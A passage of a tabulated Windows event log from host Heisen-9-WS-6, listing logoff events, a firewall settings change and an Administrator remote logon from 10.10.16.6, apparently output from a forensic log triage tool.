&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ImpersonationLevel: '%%1833'     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserSid: S-1-0-0          &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TransmittedServices: '-'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ProcessId: '0x0'                 &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserName: Werni            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ProcessName: '-'                 &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-24 23:17:37 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 4812      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Werni            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x54b5d'         &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-24 23:19:37 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 4823      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Werni            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-1002   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x81186'         &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-25 19:50:27 &#9474; &#8227; Windows Firewall Settings         &#9474; 1     &#9474; Microsoft-Windows-Windows Fire &#9474; 2002     &#9474; 1559      &#9474; Heisen-9-WS-6   &#9474; ModifyingUser: S-1-5-80-308807   &#9474;
&#9474;                     &#9474; Have Been Changed                   &#9474;       &#9474; wall With Advanced Security    &#9474;          &#9474;           &#9474;                 &#9474; 3201-1464728630-1879813800-110   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 7566885-823218052                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingValue: '06000000'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingType: 2                   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingValueSize: 4              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingValueDisplay: Private,P   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ublic                            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; Origin: 1                        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ModifyingApplication: ''         &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-25 19:52:38 &#9474; &#8227; Admin User Remote Logon           &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4624     &#9474; 5096      &#9474; Heisen-9-WS-6   &#9474; AuthenticationPackageName: Neg   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; otiate                           &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; LogonProcessName: User32         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetOutboundDomainName: '-'    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLinkedLogonId: '0x0'       &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; LmPackageName: '-'               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserName: HEISEN-9-WS-6   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; $                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; IpAddress: 10.10.16.6            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; KeyLength: 0                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectLogonId: '0x3e7'          &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x862e7'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ElevatedToken: '%%1842'          &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; LogonGuid: 00000000-0000-0000-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 0000-000000000000                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; RestrictedAdminMode: '%%1843'    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectDomainName: WORKGROUP     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 10                    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; VirtualAccount: '%%1843'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetOutboundUserName: '-'      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; WorkstationName: HEISEN-9-WS-6   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; IpPort: '0'                      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ImpersonationLevel: '%%1833'     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserSid: S-1-5-18         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TransmittedServices: '-'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ProcessId: '0x604'               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ProcessName: C:\Windows\System   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 32\svchost.exe                   &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-25 19:53:08 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 5237      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x78ed7'         &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-25 19:53:21 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 5260      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 7                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x197eb5'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-25 19:53:59 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 5271      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x1919c9'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-25 19:54:15 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 5302      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 7                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x1d8dcd'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;